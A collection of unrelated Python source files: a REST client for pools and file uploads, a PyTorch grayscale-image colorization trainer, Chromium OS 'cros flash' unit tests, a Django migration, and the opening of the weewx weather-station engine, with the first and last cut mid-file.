- userfile (:class:`.UserFile`): The userfile reference for the
file to be uploaded. Must be created from a file that exists
locally.
:Kwargs:
- callback (func): A function to be called to report upload progress.
The function must take three arguments: the percent uploaded (float), the
bytes uploaded (float), and the total bytes to be uploaded (float).
- block (int): The amount of data uploaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the PUT response, however this is not
required if the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
upload failed of ``userfile`` was invalid.
"""
#TODO: Get progress feedback working
if not hasattr(userfile, "create_query_specifier"):
return Response(
False,
RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("send_file, file={0}".format(userfile))
url = self.url("files/{name}")
try:
file_spec = userfile.create_query_specifier()
params = {'timestamp':file_spec['Timestamp'],
'originalFilePath':file_spec['OriginalPath']}
self._log.debug("File description: {0}".format(params))
put_resp = rest_client.put(self._auth,
url,
self.headers,
userfile,
params,
block_size=block,
callback=callback)
except (RestCallException, FileMissingException) as exp:
return Response(False, exp)
else:
return Response(True, put_resp)
def add_pool(self, target_size=0, max_tasks=1, communication=False, certs=[]):
"""
Add a new pool.
:Kwargs:
- target_size (int): The target size of the pool. The default is 0.
- max_tasks (int): Max tasks that can run on a single TVM.
The default is 1.
- communication (bool): Indicates whether tasks running on TVMs
in the pool need to ba able to communicate directly with each
other. The default is ``False``.
- certs (list): A list of certificates that need to be installed
on the TVMs of the pool. The maximum number of certs that can
be installed on a pool is 10.
:Returns:
- A :class:`.Response` object a dict with the new pool id and
a link to the newly created pool.
``{'id': '', 'link': ''}``
- If the call failed or if the response is incomplete/malformed
a :class:`.Response` object with a :class:`.RestCallException`.
"""
self._log.debug("add_pool")
url = self.url("pools")
if len(certs) > 10:
certs = certs[0:10]
try:
message = {
'targetDedicated': str(int(target_size)),
'maxTasksPerTVM': str(int(max_tasks)),
'communication': bool(communication),
'certificateReferences': list(certs)}
except ValueError as exp:
return Response(
False,
RestCallException(ValueError, str(exp), exp))
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if utils.valid_keys(resp, ['poolId', 'link']):
return Response(True, resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted pool response",
resp))
def resize_pool(self, pool_id, target_size):
"""
Resize an existing pool.
:Args:
- pool_id (str): The ID of the pool to be resized.
- target_size (int): The new size of the pool.
:Returns:
- :class:`.Response` with the POST response, however this is not
required if the call was successful.
- If the call failed a :class:`.Response` object with a
:class:`.RestCallException`.
"""
self._log.debug("resize_pool, pool_id={0}, "
"target_size={1}".format(pool_id, target_size))
url = self.url("pools/{poolid}/actions/resize")
url = url.format(url, poolid=pool_id)
message = {'targetDedicated': str(target_size)}
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
return Response(True, resp)
def get_pool(self, pool_id=None, url=None):
"""
Gets information about a pool.
Pool info can be retrieved by supplying **either** the pool's ID
**or** a URL to the pool. If both are supplied, URL is used.
:Kwargs:
- pool_id (str): ID of the pool on which info is requested.
- url (str): A complete URL to the pool info.
:Returns:
- A :class:`.Response` object containing the pool details as a
dictionary, if successful. Otherwise the Response will
contain the :exc:`.RestCallException`.
- :class:`.RestCallException` if neither pool ID or URL are
supplied.
- :class:`.RestCallException` if pool details dictionary is
malformed / missing necessary keys
"""
self._log.debug("get_pool, pool_id={0}, url={1}".format(pool_id, url))
if not url and pool_id:
url = self.url("pools/{poolid}").format(poolid=pool_id)
elif not url and not pool_id:
return Response(
False,
RestCallException(AttributeError,
"Either pool_id or url must be set",
None))
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def list_pools(self):
"""Lists the users pools.
:Returns:
- :class:`.Response` object containing success of call. If
successful, the ``Response.result`` will contain a list of
pool dictionaries. If failed, ``Response.result`` will
hold the :exc:`.RestCallException`.
"""
self._log.debug("list_pools, no params")
url = self.url("pools")
try:
get_resp = rest_client.get(self._auth, url,
self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def delete_pool(self, pool_id):
"""
Delete an existing pool.
:Args:
- pool_id (str): The ID of the pool to be deleted.
:Returns:
- :class:`.Response` with the POST response, however this is not
required if the call was successful.
- If the call failed a :class:`.Response` object with a
:class:`.RestCallException`.
"""
self._log.debug("delete_pool, no params")
url = self.url("pools/{poolid}")
url = url.format(url, poolid=pool_id)
try:
resp = rest_client.delete(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
return Response(True, resp)
|
# For plotting
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
# For conversion
from skimage.color import lab2rgb, rgb2lab, rgb2gray
from skimage import io
# For everything
import torch
import torch.nn as nn
import torch.nn.functional as F
# For our model
import torchvision.models as models
from torchvision import datasets, transforms
# For utilities
import os, shutil, time
# Check if GPU is available
use_gpu = torch.cuda.is_available()
def validate(val_loader, model, criterion, save_images, epoch):
model.eval()
# Prepare value counters and timers
batch_time, data_time, losses = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
already_saved_images = False
for i, (input_gray, input_ab, target) in enumerate(val_loader):
data_time.update(time.time() - end)
# Use GPU
if use_gpu: input_gray, input_ab, target = input_gray.cuda(), input_ab.cuda(), target.cuda()
# Run model and record loss
output_ab = model(input_gray) # throw away class predictions
loss = criterion(output_ab, input_ab)
losses.update(loss.item(), input_gray.size(0))
# Save images to file
if save_images and not already_saved_images:
already_saved_images = True
for j in range(min(len(output_ab), 10)): # save at most 5 images
save_path = {'grayscale': 'outputs/gray/', 'colorized': 'outputs/color/'}
save_name = 'img-{}-epoch-{}.png'.format(i * val_loader.batch_size + j, epoch)
to_rgb(input_gray[j].cpu(), ab_input=output_ab[j].detach().cpu(), save_path=save_path, save_name=save_name)
# Record time to do forward passes and save images
batch_time.update(time.time() - end)
end = time.time()
# Print model accuracy -- in the code below, val refers to both value and validation
if i % 25 == 0:
print('Validate: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
i, len(val_loader), batch_time=batch_time, loss=losses))
print('Finished validation.')
return losses.avg
def train(train_loader, model, criterion, optimizer, epoch):
print('Starting training epoch {}'.format(epoch))
model.train()
# Prepare value counters and timers
batch_time, data_time, losses = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
for i, (input_gray, input_ab, target) in enumerate(train_loader):
# Use GPU if available
if use_gpu: input_gray, input_ab, target = input_gray.cuda(), input_ab.cuda(), target.cuda()
# Record time to load data (above)
data_time.update(time.time() - end)
# Run forward pass
output_ab = model(input_gray)
loss = criterion(output_ab, input_ab)
losses.update(loss.item(), input_gray.size(0))
# Compute gradient and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Record time to do forward and backward passes
batch_time.update(time.time() - end)
end = time.time()
# Print model accuracy -- in the code below, val refers to value, not validation
if i % 25 == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses))
print('Finished training epoch {}'.format(epoch))
class AverageMeter(object):
'''A handy class from the PyTorch ImageNet tutorial'''
def __init__(self):
self.reset()
def reset(self):
self.val, self.avg, self.sum, self.count = 0, 0, 0, 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def to_rgb(grayscale_input, ab_input, save_path=None, save_name=None):
'''Show/save rgb image from grayscale and ab channels
Input save_path in the form {'grayscale': '/path/', 'colorized': '/path/'}'''
plt.clf() # clear matplotlib
color_image = torch.cat((grayscale_input, ab_input), 0).numpy() # combine channels
color_image = color_image.transpose((1, 2, 0)) # rescale for matplotlib
color_image[:, :, 0:1] = color_image[:, :, 0:1] * 100
color_image[:, :, 1:3] = color_image[:, :, 1:3] * 255 - 128
color_image = lab2rgb(color_image.astype(np.float64))
grayscale_input = grayscale_input.squeeze().numpy()
#print(grayscale_input.mode)
if save_path is not None and save_name is not None:
#grayscale_input = grayscale_input.convert('RGB')
print(grayscale_input.shape)
print(color_image.shape)
plt.imsave(arr=grayscale_input, fname='{}{}'.format(save_path['grayscale'], save_name), cmap='gray')
plt.imsave(arr=color_image, fname='{}{}'.format(save_path['colorized'], save_name))
class GrayscaleImageFolder(datasets.ImageFolder):
'''Custom images folder, which converts images to grayscale before loading'''
def __getitem__(self, index):
path, target = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img_original = self.transform(img)
img_original = np.asarray(img_original)
img_lab = rgb2lab(img_original)
img_lab = (img_lab + 128) / 255
img_ab = img_lab[:, :, 1:3]
img_ab = torch.from_numpy(img_ab.transpose((2, 0, 1))).float()
img_original = rgb2gray(img_original)
img_original = torch.from_numpy(img_original).unsqueeze(0).float()
if self.target_transform is not None:
target = self.target_transform(target)
return img_original, img_ab, target
class ColorizationNet(nn.Module):
def __init__(self, input_size=128):
super(ColorizationNet, self).__init__()
MIDLEVEL_FEATURE_SIZE = 128
## First half: ResNet
resnet = models.resnet18(num_classes=365)
# Change first conv layer to accept single-channel (grayscale) input
resnet.conv1.weight = nn.Parameter(resnet.conv1.weight.sum(dim=1).unsqueeze(1))
# Extract midlevel features from ResNet-gray
self.midlevel_resnet = nn.Sequential(*list(resnet.children())[0:6])
## Second half: Upsampling
self.upsample = nn.Sequential(
nn.Conv2d(MIDLEVEL_FEATURE_SIZE, 128, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 2, kernel_size=3, stride=1, padding=1),
nn.Upsample(scale_factor=2)
)
def forward(self, input):
# Pass input through ResNet-gray to extract features
midlevel_features = self.midlevel_resnet(input)
# Upsample to get colors
output = self.upsample(midlevel_features)
return output
model = ColorizationNet()
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2, weight_decay=0.0)
train_transforms = transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip()])
train_imagefolder = GrayscaleImageFolder(r'C:\Users\liyun\PycharmProjects\Colorization\images\train', train_transforms)
train_loader = torch.utils.data.DataLoader(train_imagefolder, batch_size=16, shuffle=True)
# Validation
val_transforms = transforms.Compose([transforms.Resize(256), transforms.CenterCrop(224)])
val_imagefolder = GrayscaleImageFolder(r'C:\Users\liyun\PycharmProjects\Colorization\images\val' , val_transforms)
val_loader = torch.utils.data.DataLoader(val_imagefolder, batch_size=16, shuffle=False)
if use_gpu:
criterion = criterion.cuda()
model = model.cuda()
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\outputs\color', exist_ok=True)
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\outputs\gray', exist_ok=True)
os.makedirs(r'C:\Users\liyun\PycharmProjects\Colorization\checkpoints', exist_ok=True)
save_images = True
best_losses = 1e10
epochs = 100
# Train model
for epoch in range(epochs):
# Train for one epoch, then validate
train(train_loader, model, criterion, optimizer, epoch)
with torch.no_grad():
losses = validate(val_loader, model, criterion, save_images, epoch)
# Save checkpoint and replace old best model if current model is better
if losses < best_losses:
best_losses = losses
torch.save(model.state_dict(), 'checkpoints/model-epoch-{}-losses-{:.3f}.pth'.format(epoch+1,losses))
|
#!/usr/bin/python
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module tests the cros flash command."""
import mock
import os
import sys
sys.path.insert(0, os.path.abspath('%s/../../..' % os.path.dirname(__file__)))
from chromite.cros.commands import cros_flash
from chromite.cros.commands import init_unittest
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import dev_server_wrapper
from chromite.lib import partial_mock
from chromite.lib import remote_access
# pylint: disable=W0212
class TestXbuddyHelpers(cros_test_lib.MockTempDirTestCase):
"""Test xbuddy helper functions."""
def testGenerateXbuddyRequestForUpdate(self):
"""Test we generate correct xbuddy requests."""
# Use the latest build when 'latest' is given.
req = 'xbuddy/latest?for_update=true&return_dir=true'
self.assertEqual(
cros_flash.GenerateXbuddyRequest('latest', 'update'), req)
# Convert the path starting with 'xbuddy://' to 'xbuddy/'
path = 'xbuddy://remote/stumpy/version'
req = 'xbuddy/remote/stumpy/version?for_update=true&return_dir=true'
self.assertEqual(cros_flash.GenerateXbuddyRequest(path, 'update'), req)
def testGenerateXbuddyRequestForImage(self):
"""Tests that we generate correct requests to get images."""
image_path = 'foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'image'),
'xbuddy/foo/bar/taco?return_dir=true')
image_path = 'xbuddy://foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'image'),
'xbuddy/foo/bar/taco?return_dir=true')
def testGenerateXbuddyRequestForTranslate(self):
"""Tests that we generate correct requests for translation."""
image_path = 'foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'translate'),
'xbuddy_translate/foo/bar/taco')
image_path = 'xbuddy://foo/bar/taco'
self.assertEqual(cros_flash.GenerateXbuddyRequest(image_path, 'translate'),
'xbuddy_translate/foo/bar/taco')
def testConvertTranslatedPath(self):
"""Tests that we convert a translated path to a usable xbuddy path."""
path = 'remote/latest-canary'
translated_path = 'taco-release/R36-5761.0.0/chromiumos_test_image.bin'
self.assertEqual(cros_flash.ConvertTranslatedPath(path, translated_path),
'remote/taco-release/R36-5761.0.0/test')
path = 'latest'
translated_path = 'taco/R36-5600.0.0/chromiumos_image.bin'
self.assertEqual(cros_flash.ConvertTranslatedPath(path, translated_path),
'local/taco/R36-5600.0.0/dev')
@mock.patch('chromite.lib.cros_build_lib.IsInsideChroot', return_value=True)
def testDevserverURLToLocalPath(self, _mock1):
"""Tests that we convert a devserver URL to a local path correctly."""
url = 'http://localhost:8080/static/peppy-release/R33-5116.87.0'
base_path = os.path.join(self.tempdir, 'peppy-release/R33-5116.87.0')
local_path = os.path.join(base_path, 'recovery_image.bin')
self.assertEqual(
cros_flash.DevserverURLToLocalPath(
url, self.tempdir, 'recovery'), local_path)
# Default to test image.
local_path = os.path.join(base_path, 'chromiumos_test_image.bin')
self.assertEqual(
cros_flash.DevserverURLToLocalPath(url, self.tempdir, 'taco'), local_path)
class MockFlashCommand(init_unittest.MockCommand):
"""Mock out the flash command."""
TARGET = 'chromite.cros.commands.cros_flash.FlashCommand'
TARGET_CLASS = cros_flash.FlashCommand
COMMAND = 'flash'
def __init__(self, *args, **kwargs):
init_unittest.MockCommand.__init__(self, *args, **kwargs)
def Run(self, inst):
init_unittest.MockCommand.Run(self, inst)
class RemoteDeviceUpdaterMock(partial_mock.PartialCmdMock):
"""Mock out RemoteDeviceUpdater."""
TARGET = 'chromite.cros.commands.cros_flash.RemoteDeviceUpdater'
ATTRS = ('UpdateStateful', 'UpdateRootfs', 'GetUpdatePayloads',
'SetupRootfsUpdate', 'Verify')
def __init__(self):
partial_mock.PartialCmdMock.__init__(self)
def GetUpdatePayloads(self, _inst, *_args, **_kwargs):
"""Mock out GetUpdatePayloads."""
def UpdateStateful(self, _inst, *_args, **_kwargs):
"""Mock out UpdateStateful."""
def UpdateRootfs(self, _inst, *_args, **_kwargs):
"""Mock out UpdateRootfs."""
def SetupRootfsUpdate(self, _inst, *_args, **_kwargs):
"""Mock out SetupRootfsUpdate."""
def Verify(self, _inst, *_args, **_kwargs):
"""Mock out SetupRootfsUpdate."""
class UpdateRunThroughTest(cros_test_lib.MockTempDirTestCase,
cros_test_lib.LoggingTestCase):
"""Test the flow of FlashCommand.run with the update methods mocked out."""
IMAGE = '/path/to/image'
DEVICE = '1.1.1.1'
def SetupCommandMock(self, cmd_args):
"""Setup comand mock."""
self.cmd_mock = MockFlashCommand(
cmd_args, base_args=['--cache-dir', self.tempdir])
self.StartPatcher(self.cmd_mock)
def setUp(self):
"""Patches objects."""
self.cmd_mock = None
self.updater_mock = self.StartPatcher(RemoteDeviceUpdaterMock())
self.PatchObject(cros_flash, 'GenerateXbuddyRequest',
return_value='xbuddy/local/latest')
self.PatchObject(dev_server_wrapper, 'DevServerWrapper')
self.PatchObject(cros_flash, 'TranslateImagePath',
return_value='taco-paladin/R36/chromiumos_test_image.bin')
self.PatchObject(remote_access, 'CHECK_INTERVAL', new=0)
self.PatchObject(remote_access.ChromiumOSDevice, '_LearnBoard',
return_value='peppy')
def testUpdateAll(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock([self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.updater_mock.patched['UpdateStateful'].called)
self.assertTrue(self.updater_mock.patched['UpdateRootfs'].called)
def testUpdateStateful(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock(['--no-rootfs-update', self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.updater_mock.patched['UpdateStateful'].called)
self.assertFalse(self.updater_mock.patched['UpdateRootfs'].called)
def testUpdateRootfs(self):
"""Tests that update methods are called correctly."""
self.SetupCommandMock(['--no-stateful-update', self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertFalse(self.updater_mock.patched['UpdateStateful'].called)
self.assertTrue(self.updater_mock.patched['UpdateRootfs'].called)
def testMissingPayloads(self):
"""Tests we exit when payloads are missing."""
self.SetupCommandMock([self.DEVICE, self.IMAGE])
with mock.patch('os.path.exists', return_value=False) as _m1:
self.assertRaises(cros_build_lib.DieSystemExit, self.cmd_mock.inst.Run)
class USBImagerMock(partial_mock.PartialCmdMock):
"""Mock out USBImager."""
TARGET = 'chromite.cros.commands.cros_flash.USBImager'
ATTRS = ('GetImagePathFromDevserver', 'CopyImageToDevice',
'ChooseRemovableDevice', 'ListAllRemovableDevices',
'GetRemovableDeviceDescription')
def __init__(self):
partial_mock.PartialCmdMock.__init__(self)
def GetImagePathFromDevserver(self, _inst, *_args, **_kwargs):
"""Mock out GetImagePathFromDevserver."""
def CopyImageToDevice(self, _inst, *_args, **_kwargs):
"""Mock out CopyImageToDevice."""
def ChooseRemovableDevice(self, _inst, *_args, **_kwargs):
"""Mock out ChooseRemovableDevice."""
def ListAllRemovableDevices(self, _inst, *_args, **_kwargs):
"""Mock out ListAllRemovableDevices."""
return ['foo', 'taco', 'milk']
def GetRemovableDeviceDescription(self, _inst, *_args, **_kwargs):
"""Mock out GetRemovableDeviceDescription."""
class ImagingRunThroughTest(cros_test_lib.MockTempDirTestCase,
cros_test_lib.LoggingTestCase):
"""Test the flow of FlashCommand.run with the imaging methods mocked out."""
IMAGE = '/path/to/image'
def SetupCommandMock(self, cmd_args):
"""Setup comand mock."""
self.cmd_mock = MockFlashCommand(
cmd_args, base_args=['--cache-dir', self.tempdir])
self.StartPatcher(self.cmd_mock)
def setUp(self):
"""Patches objects."""
self.cmd_mock = None
self.imager_mock = self.StartPatcher(USBImagerMock())
self.PatchObject(cros_flash, 'GenerateXbuddyRequest',
return_value='xbuddy/local/latest')
self.PatchObject(dev_server_wrapper, 'DevServerWrapper')
self.PatchObject(cros_flash, 'TranslateImagePath',
return_value='taco-paladin/R36/chromiumos_test_image.bin')
self.PatchObject(os.path, 'exists', return_value=True)
def testLocalImagePath(self):
"""Tests that imaging methods are called correctly."""
self.SetupCommandMock(['usb:///dev/foo', self.IMAGE])
with mock.patch('os.path.isfile', return_value=True) as _m:
self.cmd_mock.inst.Run()
self.assertTrue(self.imager_mock.patched['CopyImageToDevice'].called)
def testNonLocalImgePath(self):
"""Tests that we try to get the image path from devserver."""
self.SetupCommandMock(['usb:///dev/foo', self.IMAGE])
with mock.patch('os.path.isfile', return_value=False) as _m1:
with mock.patch('os.path.isdir', return_value=False) as _m2:
self.cmd_mock.inst.Run()
self.assertTrue(
self.imager_mock.patched['GetImagePathFromDevserver'].called)
self.assertTrue(self.imager_mock.patched['CopyImageToDevice'].called)
def testConfirmNonRemovableDevice(self):
"""Tests that we ask user to confirm if the device is not removable."""
with mock.patch.object(cros_build_lib, 'BooleanPrompt') as mock_prompt:
self.SetupCommandMock(['usb:///dev/dummy', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertTrue(mock_prompt.called)
def testSkipPromptNonRemovableDevice(self):
"""Tests that we skip the prompt for non-removable with --yes."""
with mock.patch.object(cros_build_lib, 'BooleanPrompt') as mock_prompt:
self.SetupCommandMock(['--yes', 'usb:///dev/dummy', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertFalse(mock_prompt.called)
def testChooseRemovableDevice(self):
"""Tests that we ask user to choose a device if none is given."""
self.SetupCommandMock(['usb://', self.IMAGE])
self.cmd_mock.inst.Run()
self.assertTrue(self.imager_mock.patched['ChooseRemovableDevice'].called)
if __name__ == '__main__':
cros_test_lib.main()
|
# Generated by Django 3.0.8 on 2020-12-28 13:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0010_invoice_pdf_document'),
]
operations = [
migrations.AlterField(
model_name='invoice',
name='pdf_document',
field=models.FileField(blank=True, null=True, upload_to='invoice_documents/'),
),
]
|
#
# Copyright (c) 2009-2020 Tom Keffer <tkeffer@gmail.com>
#
# See the file LICENSE.txt for your full rights.
#
"""Main engine for the weewx weather system."""
# Python imports
from __future__ import absolute_import
from __future__ import print_function
import gc
import logging
import socket
import sys
import threading
import time
# weewx imports:
import weeutil.logger
import weeutil.weeutil
import weewx.accum
import weewx.manager
import weewx.qc
import weewx.station
import weewx.units
from weeutil.weeutil import to_bool, to_int, to_sorted_string
from weewx import all_service_groups
log = logging.getLogger(__name__)
class BreakLoop(Exception):
"""Exception raised when it's time to break the main loop."""
class InitializationError(weewx.WeeWxIOError):
"""Exception raised when unable to initialize the console."""
#==============================================================================
# Class StdEngine
#==============================================================================
class StdEngine(object):
"""The main engine responsible for the creating and dispatching of events
from the weather station.
It loads a set of services, specified by an option in the configuration
file.
When a service loads, it binds callbacks to events. When an event occurs,
the bound callback will be called."""
def __init__(self, config_dict):
"""Initialize an instance of StdEngine.
config_dict: The configuration dictionary. """
# Set a default socket time out, in case FTP or HTTP hang:
timeout = int(config_dict.get('socket_timeout', 20))
socket.setdefaulttimeout(timeout)
# Default garbage collection is every 3 hours:
self.gc_interval = int(config_dict.get('gc_interval', 3 * 3600))
# Set up the callback dictionary:
self.callbacks = dict()
# Set up the weather station hardware:
self.setupStation(config_dict)
# Hook for performing any chores before loading the services:
self.preLoadServices(config_dict)
# Load the services:
self.loadServices(config_dict)
# Another hook for after the services load.
self.postLoadServices(config_dict)
def setupStation(self, config_dict):
"""Set up the weather station hardware."""
# Get the hardware type from the configuration dictionary. This will be
# a string such as "VantagePro"
station_type = config_dict['Station']['station_type']
# Find the driver name for this type of hardware
driver = config_dict[station_type]['driver']
log.info("Loading station type %s (%s)", station_type, driver)
# Import the driver:
__import__(driver)
# Open up the weather station, wrapping it in a try block in case
# of failure.
try:
# This is a bit of Python wizardry. First, find the driver module
# in sys.modules.
driver_module = sys.modules[driver]
# Find the function 'loader' within the module:
loader_function = getattr(driver_module, 'loader')
# Call it with the configuration dictionary as the only argument:
self.console = loader_function(config_dict, self)
except Exception as ex:
log.error("Import of driver failed: %s (%s)", ex, type(ex))
weeutil.logger.log_traceback(log.critical, " **** ")
# Signal that we have an initialization error:
raise InitializationError(ex)
def preLoadServices(self, config_dict):
self.stn_info = weewx.station.StationInfo(self.console, **config_dict['Station'])
self.db_binder = weewx.manager.DBBinder(config_dict)
def loadServices(self, config_dict):
"""Set up the services to be run."""
# This will hold the list of objects, after the services has been
# instantiated:
self.service_obj = []
# Wrap the instantiation of the services in a try block, so if an
# exception occurs, any service that may have started can be shut
# down in an orderly way.
try:
# Go through each of the service lists one by one:
for service_group in all_service_groups:
# For each service list, retrieve all the listed services.
# Provide a default, empty list in case the service list is
# missing completely:
for svc in weeutil.weeutil.option_as_list(config_dict['Engine']['Services'].get(service_group, [])):
if svc == '':
log.debug("No services in service group %s", service_group)
continue
log.debug("Loading service %s", svc)
# Get the class, then instantiate it with self and the config dictionary as arguments:
obj = weeutil.weeutil.get_object(svc)(self,config_dict)
# Append it to the list of open services.
self.service_obj.append(obj)
log.debug("Finished loading service %s", svc)
except Exception:
# An exception occurred. Shut down any running services, then
# reraise the exception.
self.shutDown()
raise
def postLoadServices(self, config_dict):
pass
def run(self):
"""Main execution entry point."""
# Wrap the outer loop in a try block so we can do an orderly shutdown
# should an exception occur:
try:
# Send out a STARTUP event:
self.dispatchEvent(weewx.Event(weewx.STARTUP))
log.info("Starting main packet loop.")
last_gc = time.time()
# This is the outer loop.
while True:
# See if garbage collection is scheduled:
if time.time() - last_gc > self.gc_interval:
gc_start = time.time()
ngc = gc.collect()
last_gc = time.time()
gc_time = last_gc - gc_start
log.info("Garbage collected %d objects in %.2f seconds", ngc, gc_time)
# First, let any interested services know the packet LOOP is
# about to start
self.dispatchEvent(weewx.Event(weewx.PRE_LOOP))
# Get ready to enter the main packet loop. An exception of type
# BreakLoop will get thrown when a service wants to break the
# loop and interact with the console.
try:
# And this is the main packet LOOP. It will continuously
# generate LOOP packets until some service breaks it by
# throwing an exception (usually when an archive period
# has passed).
for packet in self.console.genLoopPackets():
# Package the packet as an event, then dispatch it.
self.dispatchEvent(weewx.Event(weewx.NEW_LOOP_PACKET, packet=packet))
# Allow services to break the loop by throwing
# an exception:
self.dispatchEvent(weewx.Event(weewx.CHECK_LOOP, packet=packet))
log.critical("Internal error. Packet loop has exited.")
except BreakLoop:
# Send out an event saying the packet LOOP is done:
self.dispatchEvent(weewx.Event(weewx.POST_LOOP))
finally:
# The main loop has exited. Shut the engine down.
log.info("Main loop exiting. Shutting engine down.")
self.shutDown()
def bind(self, event_type, callback):
"""Binds an event to a callback function."""
# Each event type has a list of callback functions to be called.
# If we have not seen the event type yet, then create an empty list,
# otherwise append to the existing list:
self.callbacks.setdefault(event_type, []).append(callback)
def dispatchEvent(self, event):
"""Call all registered callbacks for an event."""
# See if any callbacks have been registered for this event type:
if event.event_type in self.callbacks:
# Yes, at least one has been registered. Call them in order:
for callback in self.callbacks[event.event_type]:
# Call the function with the event as an argument:
callback(event)
def shutDown(self):
"""Run when an engine shutdown is requested."""
# If we've gotten as far as having a list of service objects, then shut
# them all down:
if hasattr(self, 'service_obj'):
while len(self.service_obj):
# Wrap each individual service shutdown, in case of a problem.
try:
# Start from the end of the list and move forward
self.service_obj[-1].shutDown()
except:
pass
# Delete the actual service
del self.service_obj[-1]
del self.service_obj
try:
del self.callbacks
except AttributeError:
pass
try:
# Close the console:
self.console.closePort()
del self.console
except:
pass
try:
self.db_binder.close()
del self.db_binder
except:
pass
def _get_console_time(self):
try:
return self.console.getTime()
except NotImplementedError:
return int(time.time() + 0.5)
#==============================================================================
# Class StdService
#==============================================================================
class StdService(object):
"""Abstract base class for all services."""
def __init__(self, engine, config_dict):
self.engine = engine
self.config_dict = config_dict
def bind(self, event_type, callback):
"""Bind the specified event to a callback."""
# Just forward the request to the main engine:
self.engine.bind(event_type, callback)
def shutDown(self):
pass
#==============================================================================
# Class StdConvert
#==============================================================================
class StdConvert(StdService):
"""Service for performing unit conversions.
This service acts as a filter. Whatever packets and records come in are
converted to a target unit system.
This service should be run before most of the others, so observations appear
in the correct unit."""
def __init__(self, engine, config_dict):
# Initialize my base class:
super(StdConvert, self).__init__(engine, config_dict)
# Get the target unit nickname (something like 'US' or 'METRIC'):
target_unit_nickname = config_dict['StdConvert']['target_unit']
# Get the target unit: weewx.US, weewx.METRIC, weewx.METRICWX
self.target_unit = weewx.units.unit_constants[target_unit_nickname.upper()]
# Bind self.converter to the appropriate standard converter
self.converter = weewx.units.StdUnitConverters[self.target_unit]
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
log.info("StdConvert target unit is 0x%x", self.target_unit)
def new_loop_packet(self, event):
"""Do unit conversions for a LOOP packet"""
# No need to do anything if the packet is already in the target
# unit system
if event.packet['usUnits'] == self.target_unit:
return
# Perform the conversion
converted_packet = self.converter.convertDict(event.packet)
# Add the new unit system
converted_packet['usUnits'] = self.target_unit
# Replace the old packet with the new, converted packet:
event.packet = converted_packet
def new_archive_record(self, event):
"""Do unit conversions for an archive record."""
# No need to do anything if the record is already in the target
# unit system
if event.record['usUnits'] == self.target_unit:
return
# Perform the conversion
converted_record = self.converter.convertDict(event.record)
# Add the new unit system
converted_record['usUnits'] = self.target_unit
# Replace the old record with the new, converted record
event.record = converted_record
#==============================================================================
# Class StdCalibrate
#==============================================================================
class StdCalibrate(StdService):
"""Adjust data using calibration expressions.
This service must be run before StdArchive, so the correction is applied
before the data is archived."""
def __init__(self, engine, config_dict):
# Initialize my base class:
super(StdCalibrate, self).__init__(engine, config_dict)
# Get the list of calibration corrections to apply. If a section
# is missing, a KeyError exception will get thrown:
try:
correction_dict = config_dict['StdCalibrate']['Corrections']
self.corrections = {}
# For each correction, compile it, then save in a dictionary of
# corrections to be applied:
for obs_type in correction_dict.scalars:
self.corrections[obs_type] = compile(correction_dict[obs_type],
